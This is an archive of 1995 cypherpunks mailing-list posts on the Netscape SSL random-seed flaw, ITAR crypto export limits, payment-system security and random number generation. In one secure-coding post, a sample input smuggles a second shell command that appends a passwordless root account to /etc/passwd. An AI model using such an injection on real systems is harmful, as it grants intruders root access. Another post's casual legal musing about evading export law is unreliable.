Who _is_ legally prohibited from using it?  I think there are some countries
where the very use of crypto is illegal (could someone please list them?),
but who else?

There are some people that may be legally prohibited from _obtaining_ it
from a US site (ITAR yadda), but even so, if JRFurriner downloads
crypto from company C's site in the US, who's guilty of ITAR-violation?
Company C for making it available, or JRF for initiating the action
that caused the bits to be send out of the country?

   - Ian "my, I seem to be posting a lot tonight"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: damion.furi@the-matrix.com (DAMION FURI)
Date: Thu, 21 Sep 95 01:45:49 PDT
To: cypherpunks@toad.com
Subject: What's with the list? (Ol
In-Reply-To: <8B18060.00050528DF.uuout@the-matrix.com>
Message-ID: <8B180AF.000505293A.uuout@the-matrix.com>
MIME-Version: 1.0
Content-Type: text/plain



DM|Anyone else get old c'punks postings remailed to them from August?

        Yup.  Blech.

   
        furi@the-matrix.com    pgp-public-key@demon.co.uk    C1225CE1
  RADical 1 Systems - Multi-Platform Custom Programming, Service, & Support






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Wed, 20 Sep 95 20:48:42 PDT
To: Nathaniel Borenstein <nsb@nsb.fv.com>
Subject: Re: first virtual "security" (!!) (was Re: Security Flaw Is Discovered In Software Used in Shopping)
In-Reply-To: <v02120d1aac85dff6bc68@[199.0.65.105]>
Message-ID: <9509210232.AA09480@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



You have excellent points in your detailed answer, thank you, but

If FV was as used as SSL could be, what prevents, to use your terms,
someone to get MILLIONS of FV's identifiers and use each one only
once, etc ... (imo your figures about SSL and crypto softs risks are
over evaluated, so I over evaluate the 'risks' of yours using same
assumptions)

There can't be more security by transferring data on the clear
compared to an encrypted one... except maybe that people using
encryption can often feel overconfident. So, as someone pointed out,
it is not that much a problem about CC# which are available easily
anyway, but in fact, using encrypted communications is the only way to
ensure (some) *privacy*, in addition to being a security improvement. A
problem is to avoid to fail on "customer expectation", especially when
you've created it. So probably there was too much focus and
advertising on security issues on the internet, by the very same
companies that prove later to fail, giving wrong expectation. Privacy
remains a goal anyway, and financial insecurity never was a problem as
long as it remains under a small %.

So I'd prefer to use crapy netscape 1.1 40 bits export SSL than your
system... Though what I'd really use is PGP :-)

Anyway, if you have happy customers, good for you... I'd suggest that
you'd use "Security through Clarity" as motto ;-)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

fissionable SEAL Team 6 Kaser Sose nuclear Clinton domestic
disruption DST





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Wed, 20 Sep 95 20:48:09 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: netscape bug
In-Reply-To: <199509201855.LAA17261@netcom16.netcom.com>
Message-ID: <9509210259.AA09589@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Vladimir Z. Nuri writes:
[... some good points and other less good (imo) deleted ...]

[.... netscape is good for us stuff ....]
 > Netscape is a world class product, and it's *free*. on this cypherpunks
 > list, I have seen no end to the venemous criticisms that people level at 
 > *free* products, which IMHO is quite tasteless at times. 

FYI Netscape IS NOT FREE, at all. re-read the Licence that you shall
read before clicking <Ok>. (though it is not a problem in itself (helas
ppl must work for a living and sell stuff), apart from the unsecurity
through obscurity which is often a result of commercial products)

[.... netscape is good for us stuff ....]
 > it reminds me of how much people here rant at Microsoft when 
 > virtually no other company on the planet could pull off what they make
 > look easy (ah, that's another story I've filled up other posts with).

Duh ... I would'nt have insulted Netscape by quoting Micro$oft in the
same post ;-) (half joking)

[.... netscape is good for us stuff ....]

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Qaddafi hack fissionable munitions terrorist Saddam Hussein Clinton





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 20 Sep 95 22:01:21 PDT
To: cypherpunks@toad.com
Subject: Re: FROM A FRIEND . . .
In-Reply-To: <199509201648.MAA14624@panix.com>
Message-ID: <43qrhf$gd5@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509201648.MAA14624@panix.com>, frissell@panix.com (Duncan Frissell) writes:
> >Updating Customers:
> >Netscape will provide the fix for Export (40 bit) versions of Netscape
> >Navigator later this week for downloading by customers on the Internet.
> >Similarly, the
> >Commerce Server patch for Export versions (40 bit) will be made available
> >from our home page. Because downloading of 128 bit versions of the software
. >is still not permitted by U.S. law, U.S. customers of Netscape Navigator,
> >Netscape Navigator Personal Edition and Netscape Commerce Server using 128
> >bit versions can request the replacement from Netscape for delivery through
> >the regular mail.
> 
> Funny, MIT and MPJ and others manage to enable the downloading of
> export-controlled software.  Also, wasn't there some sort of promise by
> Netscape after we broke the 40-bit version to make the 128-bit version
> available to US users under the Beta/freeware system?  What happened to that
> plan?

  We are also examining some sort of binary patch technology, so that
folks with the US-only version can easily download and apply the patch.

  I think that the general opinion of engineers and management here at
Netscape is that it would be A Really Good Thing to have our US-only
128+ bit version of Netscape Navigator available for download by US
citizens and others who are not legally prohibited from using it.

  As a matter of fact, up until the RNG thing hit on sunday night, I
had been making myself a major pain in the ass to netscape managers
and executive, bugging them every day for at least the past several
weeks, to get a decision about making the US version available for
free download.

  I know that MIT, RSA, and others make crypto code available for
download with various mechanism.  I'm sure that these institutions
did not make the decision lightly.  This issue is now a very high
priority for our lawyers, but it will take some time for them to
reach a legal opinion about Netscape's legal exposure.  The fact that
MIT and RSA have done it does not mean that the government will not
go after Netscape for similar behavior.  We all know what a juicy
target Netscape is these days...  :-)

  We have submitted our proposal for download checking to the State Dept.
I think that our process does more validation than what others have done.
The State Dept. has so far refused to send us any kind of written approval
of our proposed methods.  I know that many of you think that this is
futile, and I won't dispute that, but I think we do have to make the
effort in order for our case to hold up later.

  We do share your frustration at being forced to use weak crypto.
This has been a major pain for us, but I believe that we are committed
to continuing to produce a version with strong crypto (as long as it
remains legal - sigh).

  I for one will always fight to ensure that we have a version of
our Navigator that supports "strong" crypto, and to make that version
easily and widely available.  The governments attempts to get
companies to produce watered down versions for the US because it is
easier will not succeed here as long as I have any say in the matter.
Also, the company has taken a vocal public position against the
current ITAR restrictions and any sort of mandatory or government
controlled key escrow.

  We are working on it.  Please try to be patient.  It is just as hard
for us as it is for you...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MIGUELDIAZ@megaweb.com (Miguel Diaz)
Date: Thu, 21 Sep 95 03:46:42 PDT
To: cypherpunks@toad.com
Subject: Seeds which depend on machine states
Message-ID: <199509211044.GAA25896@mail-e1a.megaweb.com>
MIME-Version: 1.0
Content-Type: text/plain


It is my suspicion that seeds which depend on machine 
states(ie state of your computer at a specific instance of 
time) would always be subject to scrutiny and de-cryption.
As long as the software used to encrypt is not self-modifying, 
the machine state can (through careful manipulation involving 
temperature, clocks, processes etc)always be replicated and 
fixed to an acceptable degree.
This allows you to look into the heart of the encryption 
method and then create a plan to decode based on a brute-force 
attack.  Time is the only friend then of the encryptor and 
unfortunately in the case of credit cards this typically is 
measured in years. Plenty of time for brute force attacks to 
yield fruit.  I'll be gone for two days. will respond to any 
comments Saturday.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 20 Sep 95 22:05:54 PDT
To: cypherpunks@toad.com
Subject: Re: NSA and Netscape Crack
In-Reply-To: <ac85fa9f010210046fb1@DialupEudora>
Message-ID: <43qrpq$gd5@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <ac85fa9f010210046fb1@DialupEudora>, norm@netcom.com (Norman Hardy) writes:
> At 3:46 PM 9/19/95, Jim Ray wrote:
> ....
> >I don't expect to know NSA's specific brute-force capability, but
> >does anyone know if the NSA has *ever* found a glaring weakness in
> >software and then told its author(s) or owner(s) about it? Do "we"
> >perform the "COMSEC" role Tim was speaking of better than the NSA?
> >JMR
> ....
> Once upon a time NSA would find weeknesses in friends' crypto systems and
> tell them about it -- depending, of course, on the situation. It was a
> reciprocal practice. We don't know that NSA didn't tell Netscape.

  As far as I know the NSA did not tell Netscape anything about this
RNG vulnerability.  If they had we would have fixed it immediately and
put up a patch.  Believe it or not we don't like being trashed for
being stupid all over the net, print media, and TV.  As far as I know
the NSA have not given us any advice about how to make our system
stronger.  I've heard rumors that they were quite upset when they
learned that SSLs 40-bit RC4 was actually 40-bit secret and 88-bit salt.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Wed, 20 Sep 95 20:49:03 PDT
To: cypherpunks@toad.com
Subject: Netscape Servers too ? (forwarded message from Marc VanHeyningen)
Message-ID: <9509210319.AA09639@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


------- start of forwarded message (RFC 934 encapsulation) -------
From: marcvh@spry.com (Marc VanHeyningen)
To: Wayne Wilson <wwilson@umich.edu>
Cc: Kazuma Andoh <andoh@nikkeibp.co.jp>, www-security@ns2.rutgers.edu
Subject: Re: What's the netscape problem 
Date: Wed, 20 Sep 1995 07:51:47 -0700

[...]
> http://home.netscape.com/newsref/std/random_seed_security.html

The interesting part of this article is the discussion of random seed
weaknesses on the *server* side.  If true, this means anybody could use
the random-seed hole to reverse engineer the process by which the
server's private key information was generated and break that keypair
with much, much much less effort than would normally be needed to factor
a 512-bit RSA key.

(Note that I'm not entirely sure Netscape's server uses 512 bit RSA keys,
since the documentation, technical data sheets, and generation process
don't give any clue about what key size is being used.  Guess they don't
want customers worrying their pretty little heads about it.)

This would mean merely getting a fixed server would be insufficient; every
Netscape server user would need to generate a new keypair, get a new Verisign
certificate, and revoke the old one.

(Oops, wait, there's no way to revoke the old one.  I guess you just have to
hope nobody does this before all those certificates expire.)

- - Marc
------- end -------

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

smuggle nuclear North Korea SDI cracking Mossad DES





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "NSB's Portable (via RadioMail)" <nsb@radiomail.net>
Date: Thu, 21 Sep 95 05:33:39 PDT
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: first virtual "security" (!!) (was Re: Security Flaw Is Discovered InSoftware Used in Shopping)
Message-ID: <RM:c0d83d13.000a7d3b.0>
MIME-Version: 1.0
Content-Type: text/plain


At  4:32 AM 9/21/95 +0200, Laurent Demailly wrote:
>You have excellent points in your detailed answer, thank you, but

Thanks.  I'm glad to be able to conduct this discussion at a cordial and
intelligent level.

>If FV was as used as SSL could be, what prevents, to use your terms,
>someone to get MILLIONS of FV's identifiers and use each one only
>once, etc ... (imo your figures about SSL and crypto softs risks are
>over evaluated, so I over evaluate the 'risks' of yours using same
>assumptions)

I think you still don't get it, Laurent.  If you intercept millions of
credit cards, you immediately have something very valuable and untraceable.
 An FV-ID is much less useful than a credit card number, because it only
works with email confirmation and only works on the net.  And merely
intercepting them doesn't get you anything -- you have to be able to answer
the confirmation messages, which is much harder to do "en masse" than
passively sniffing for things (and possibly then decrypting them).  And a
scheme that also replies to such messages is far more likely to leave
traces by which the criminal is caught.

In other words, when you look at the "millions of interceptions" case, the
value of doing this is lower for FV, the difficulty of automating it in the
large scale is higher, and the risk of detection is higher, as compared
with a one-way scheme that transmits credit cards, whether encrypted or
not.

>There can't be more security by transferring data on the clear
>compared to an encrypted one... except maybe that people using
>encryption can often feel overconfident. 

Of course there can, if you're not talking about the same data, which we're
not.  It's much safer to transmit something without high intrinsic value in
unencrypted form than to transmit something with high intrinsic value in
encrypted form.  That's why FV-ID's were designed the way they are -- low
intrinsic value, easy to revoke & reissue, etc.  By analogy, it is safer to
send a weather report unencrypted than to send detailed instructions about
nuclear weapons encrypted.

>So, as someone pointed out,
>it is not that much a problem about CC# which are available easily
>anyway, but in fact, using encrypted communications is the only way to
>ensure (some) *privacy*, in addition to being a security improvement. 

Also not true.  A scheme like FV's gives a fairly high privacy level
through the use of pseudonyms.  Your FV-ID can be traced to you *only* by
FV, and we won't hand out that informaton without a court order.

>financial insecurity never was a problem as
>long as it remains under a small %.

This is an amazing statement, Laurent.  It's sort of like saying that
building a city in the middle of a flood plain isn't a problem as long as
there isn't a flood.  You can't dismiss even a low-probability disaster if
the consequences of the disaster are extremely high.

If the SSL bug had been discovered AFTER there were hundreds of millions of
credit cards being transmitted via SSL, and if the person who discovered it
had criminal intent, the entire global credit card infrastructure really
would have been endangered.  Personally, I'm always suspicious of any
claims to have "fixed the last bug", so I don't see any reason to assume
this isn't inevitable in the long run if a scheme like SSL is used.

>Anyway, if you have happy customers, good for you... I'd suggest that
>you'd use "Security through Clarity" as motto ;-)

That's not a bad motto.  I'd prefer to describe our system as focusing on
practical, comprehensive security rather than chasing the myth of perfect
cryptographic security.  (For example, we've probably put more effort into
making our server secure from breakins than just about any other site on
the Internet.)

We're not opposed to cryptography, by the way.  There are some obvious
places where the use of digital signatures could directly enhance our
system, and we're pursuing them.  It has also not escaped our notice that,
even though we strongly believe that transmitting FV-ID's in the clear is
safer than transmitting credit cards encrypted, it would be safer STILL to
transmitthe FV-ID's encrypted -- sort of the best of both worlds.  And you
can count on our doing that when there is a good Internet infrastructure
for doing so, which we don't yet believe to be the case.  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Wed, 20 Sep 95 21:05:02 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Project: a standard cell random number generator
In-Reply-To: <ac86115235021004fbe4@[205.199.118.202]>
Message-ID: <9509210404.AA09855@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



On the opposite, using some kind of small hardware devices plugged in
the serial or // port could be a good point to help actual sales of
softwares that would depend on it (ie you sell the hardware only with
the soft, so ppl have to actually buy it to get full security instead
of stealing it).
[I'm playing devil's lawyer here]

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

KGB Uzi plutonium Ortega Mossad South Africa cracking




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: karlton@ghoti.mcom.com (Phil Karlton)
Date: Wed, 20 Sep 95 23:06:30 PDT
To: cypherpunks@toad.com
Subject: Re: (none)
In-Reply-To: <199509201509.IAA19829@blob.best.net>
Message-ID: <43qvbk$lra@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald <jamesd@echeque.com> writes:
    Whenever you need a random number, take a one way checksum, 
    for example MD5, of the most recently altered part of that 
    buffer.  Use that as your random number. 

How is this any better than feeding the data into the MD5
hash as I go? This is not a rhetorical question.

PK
-- 
--
Philip L. Karlton			karlton@netscape.com
Principal Curmudgeon			http://www.netscape.com/people/karlton
Netscape Communications Corporation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 21 Sep 95 03:42:30 PDT
To: hallam@w3.org
Subject: Re: Cybersecurity
In-Reply-To: <9509201549076057@ci.diamond-bar.ca.us>
Message-ID: <Pine.SUN.3.91.950921061134.12901A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 7 Sep 1995 hallam@w3.org wrote:

> The UK laabour party is opposed to key escrow "we do not accept the "clipper 
> chip" argument". The Tories have less than half the level of popular support an
> are barely recognisable as a government.
> 
>         Phill

Wait till Labour finds out that crypto makes "The Caring Society" 
impossible.  Perhaps they'll change their view then.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Thu, 21 Sep 95 00:30:00 PDT
To: cypherpunks@toad.com
Subject: Re: FROM A FRIEND . . .
In-Reply-To: <199509201648.MAA14624@panix.com>
Message-ID: <43r488$met@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <43qvn4$mm@calum.csclub.uwaterloo.ca>, iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg) writes:
> In article <43qrhf$gd5@tera.mcom.com>,
> Jeff Weinstein <jsw@neon.netscape.com> wrote:
> >  I think that the general opinion of engineers and management here at
> >Netscape is that it would be A Really Good Thing to have our US-only
> >128+ bit version of Netscape Navigator available for download by US
> >citizens and others who are not legally prohibited from using it.
> 
> Who _is_ legally prohibited from using it?  I think there are some countries
> where the very use of crypto is illegal (could someone please list them?),
> but who else?
> 
> There are some people that may be legally prohibited from _obtaining_ it
> from a US site (ITAR yadda), but even so, if JRFurriner downloads
> crypto from company C's site in the US, who's guilty of ITAR-violation?
> Company C for making it available, or JRF for initiating the action
> that caused the bits to be send out of the country?

  Poor choice of words on my part.  My understanding is that we can not
export our US-only product, except to canada - for the use of canadian
citizens.  I also believe that it is illegal for anyone except US citizens,
permanent residents of the US (green card holders) and Canadian citizens
to use it, even within the US.  I'm not a lawyer, and I've not read
all of ITAR myself, so I could be totally wrong...

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous@freezone.remailer
Date: Thu, 21 Sep 95 04:30:45 PDT
To: cypherpunks@toad.com
Subject: Fraud Fraut Froth
Message-ID: <199509211130.HAA20039@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


NY Times, Sept 21, 1995.

Fraud Can Flourish Without the Internet

To the Editor:

Your Sept. 19 front-page article on the discovery by two
University of California graduate students of a flaw in
Netscape, the software used for purchases over the Internet's
World Wide Web, raises a number of obvious questions.

First, who needs high tech to perpetrate fraud? Any
unscrupulous commercial employee could use or sell your credit
card number without employing technology.

Every time you hand your card to a waiter in a restaurant, it
disappears for several minutes. The department store clerks
and gas station attendants you deal with also have access to
your card number. How secure is that?

Ever give your credit card number over the phone to make a
purchase from a mail-order house? Or to secure a reservation
at a hotel? Who's to say that the employees you're speaking
with are honest? Or that your phone is not tapped? Or theirs?

I shop on the Internet; I may get ripped off. What's my
liability? Fifty bucks -- same as the other scenarios I've
described. That's in my credit agreement with the card issuer.

So why all the hoopla? Is credit card fraud significantly more
prevalent on the Internet than in other modes of purchasing?

Or is the banking industry whipping up hysteria among
purchasers to curb fraud losses? Was the work of those
graduate students funded by someone -- directly or indirectly?
If so, by whom? A banking consortium? A high-tech company
working on some patentable security scheme?

Robert Herrig
Peekskill, N.Y., Sept. 19,1995.

The writer is a systems consultant.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Thu, 21 Sep 95 04:52:49 PDT
To: anonymous@freezone.remailer.mindport.net
Subject: Re: Fraud Fraut Froth
In-Reply-To: <199509211130.HAA20039@light.lightlink.com>
Message-ID: <Pine.SUN.3.91.950921075223.28417A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 21 Sep 1995 anonymous@freezone.remailer.mindport.net wrote:

> NY Times, Sept 21, 1995.
> 
> Fraud Can Flourish Without the Internet
> 
> To the Editor:
> 
> Your Sept. 19 front-page article on the discovery by two
> University of California graduate students of a flaw in
> Netscape, the software used for purchases over the Internet's
> World Wide Web, raises a number of obvious questions.
> 
> First, who needs high tech to perpetrate fraud? Any
> unscrupulous commercial employee could use or sell your credit
> card number without employing technology.
> 
> Every time you hand your card to a waiter in a restaurant, it
> disappears for several minutes. The department store clerks
> and gas station attendants you deal with also have access to
> your card number. How secure is that?

[...]

> 
> Robert Herrig
> Peekskill, N.Y., Sept. 19,1995.
> 
> The writer is a systems consultant.

[For Netscape?]


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 21 Sep 95 08:28:18 PDT
To: karlton@netscape.com
Subject: Re: "random" number seeds vs. Netscape
Message-ID: <9509211524.AA17588@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Philip L. Karlton said:
> 
> I agree, but I have a hard arguing with those that asser that the security
> of UNIX is weak enough that given what we are doing for the patch it will
> be easier to become root from a logged in account than to hack the seed.
> 
Why would you have to argue with them?  When they say that's it's easier to 
become root from a logged in account tell them, "Good, that's just as it 
should be!"  It's a feature, not a problem!

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 21 Sep 95 08:30:42 PDT
To: jordan@Heuristicrat.COM
Subject: Re:  RSA Prevails In Arbitration Against Cylink
Message-ID: <9509211527.AA17593@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> Just a note for those who aren't aware, Business Wire is a pay-per-use
> "news release" service.  That is, RSA wrote the contents of what Bob
> (Hi!) posted.
> 
> The clue is at the bottom of the "story":
> 
> 	CONTACT: RSA
> 	Kurt Stammberger, 415/595-8782
> 	kurt@rsa.com
> 
> This is not to say anything pro or con about the content of the press
> release; just that it wasn't written by a third party.
> 
> /jordan
> 

I can't imagine that anyone wouldn't have known that, it was written from
RSA's point of view.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 21 Sep 95 05:36:10 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Please send me SSL problems...
Message-ID: <9509211235.AA20792@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>None of these organisations have mentioned GSSAPI to me.

>Do you have a source?

Digital:  ask John Wray.
IBM:  find someone in the DSOM group
HP:  no name I can give.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Thu, 21 Sep 95 01:41:27 PDT
To: cypherpunks@toad.com
Subject: Re: Please send me SSL problems...
In-Reply-To: <eay@mincom.oz.au>
Message-ID: <43r8e5$ove@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9509210118.ZM154@tofuhut>, jsw@netscape.com (Jeff Weinstein) writes:
>   I don't think that the API that SSLRef export is not particularly interesting.

  Yikes!!  I can't believe I wrote that.  What I meant was:

I don't think that the API that SSLRef exports is particularly interesting.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Thu, 21 Sep 95 08:57:20 PDT
To: perry@piermont.com
Subject: Re: "random" number seeds vs. Netscape
Message-ID: <9509211553.AA17620@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry said:
> 
> Also be especially careful about how you run the thing! Don't use
> popen or anything like it!

There's nothing inherently wrong with using popen or system.  The problem
arises when you use information given to you from outside as the argument
to popen or system without checking it.  You should have an awareness that
whatever you pass to system or popen is essentially being passed as the
commandstring to a:

    execl("/bin/sh", "sh", "-c", commandstring, (char *)0);

Make sure you know the implications of this.  If you know that what you're
passing can happily be exec'd directly, it's more efficient to do an exec 
yourself instead of (effectively) having a sh exec'd to exec your code.
Of course you can see that you shouldn't do something like:

    cout << "Enter the directory to list: " 
    cin >> buffer;
    system(buffer);

especially if you're running with any sort of priviledges.  Suppose someone
entered:

    / ; echo >>/etc/passwd "gotcha::0:0:Intruder Man:/:/sbin/sh

Obviously if this program was being run as root you'd be in trouble.
If it was running as a user it would let them do something like add
an .rhosts for the user that would let them get on the machine.  Once
on a machine it's often fairly easy to leverage that access into root
access.

Oh well, I could talk about security all day:)

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: landon@netcom.com (Landon Dyer)
Date: Thu, 21 Sep 95 09:14:13 PDT
To: cypherpunks@toad.com
Subject: Re: FROM A FRIEND . . . (the joys of boating)
Message-ID: <199509211600.JAA10128@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>On 21 Sep 1995, Jeff Weinstein wrote:
>>   My understanding is that we can not
>> export our US-only product, except to canada - for the use of canadian
>> citizens.  I also believe that it is illegal for anyone except US citizens,
>> permanent residents of the US (green card holders) and Canadian citizens
>> to use it, even within the US.  I'm not a lawyer, and I've not read
>> all of ITAR myself, so I could be totally wrong...
>
> All the same, if anyone wants an easy and economical
>way to get around ITAR, have someone do your cypto software development 
>just north of the border (Vancouver's just north of Seattle and close 
>enough to Silicon Valley, with excellent net-access) or at least just
>publish it here first.

  here's a possible bullshit wrinkle.  i'm not a lawyer, but one of my
bosses was, once.

  said boss owned a boat that was of canadian registry.  he was a
canadian citizen with a green card.  he *claimed* that, even when
docked in the SF bay area, his boat was technically considered
canadian territory, due to some maritime law malarky.  US authorities
theoretically had to go through various hoops to legally board his
vessel.

  i wouldn't try to halt a SWAT team, or even the local fuzz, with
this tidbit of legal gaga.  but doing crypto development on such a
vessel might hold up in court for something as squishy as ITAR.

  naturally, commuting to canada is probably a *lot* cheaper than
owning a boat.  the uninitiated have little idea what these holes-
in-the-water really cost.... :-)


-landon
  (returning to lurk-mode)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "NSB's Portable (via RadioMail)" <nsb@radiomail.net>
Date: Thu, 21 Sep 95 09:05:31 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] "hacker" was: first virtual "security"
Message-ID: <RM:c0d83d13.000a7f74.0>
MIME-Version: 1.0
Content-Type: text/plain


At  2:03 AM 9/21/95 -0400, Ian Goldberg wrote:
>In article <0kMA2EqMc50eMEb4Yx@nsb.fv.com>,
>Nathaniel Borenstein  <nsb@nsb.fv.com> wrote:
>>If an SSL-like scheme were in wide use world-wide, the hacker who just
>>made a name for himself by breaking SSL could instead have gone down in
>
>Ugh.  That word again.  I'm only 22, but I'm old enough to remember
>when there were people called "crackers", and being called a "hacker"
>was a _good_ thing.

Hey, this guy didn't steal anything, and he publicized the hole.  He wasn't
a criminal, he was a good guy.  That's why I called him a hacker.  -- NB




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Thu, 21 Sep 95 06:07:41 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Munitions shirt (again)
Message-ID: <m0svlNY-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:

: At 3:49 PM 9/20/95, Ian Goldberg wrote:
: >So, Dave and I got free munitions shirts (they're different, though;
: >the font is smaller and they have a bunch of X'd out Constitutional
: >Amendments on the back; I think they ere designed by Joel Furr) for
: >our bug find.
: >
: >So I'm wearing it today.  The thing is, I live in International House,
: >a residence that has 50% non-Americans.
: >
: >So, any consensus as to whether it's actually illegal to do so?  I
: >remember some disagreement a few weeks ago that AFAIK wasn't resolved.
: 
: The _consensus_ here seems to be: "This t-shirt is illegal to wear in front
: of non-Americans," judging by the comments here.

Assuming that the International Traffic in Arms Regulations are the
law (rather than the unconstitutional silliness that they actually
are), this consensus is correct.  The ITAR forbid the ``disclosure''
of cryptographic ``software''--very broadly defined--to ``foreign''
persons ``within or without the United States.''  It says nothing
about the medium of the disclosure: whether it is a T-shirt or
computer screen.
 
: The _reality_ is quite different, I think, and the "this shirt is illegal"
: hype is, in my opinion, just that, hyperbole. Even hyperbull, too.
: 
: Books and written articles containing crypto algorithms are _not_ illegal
: for "furriners" to look at. The t-shirt contains at most a fuzzy printing
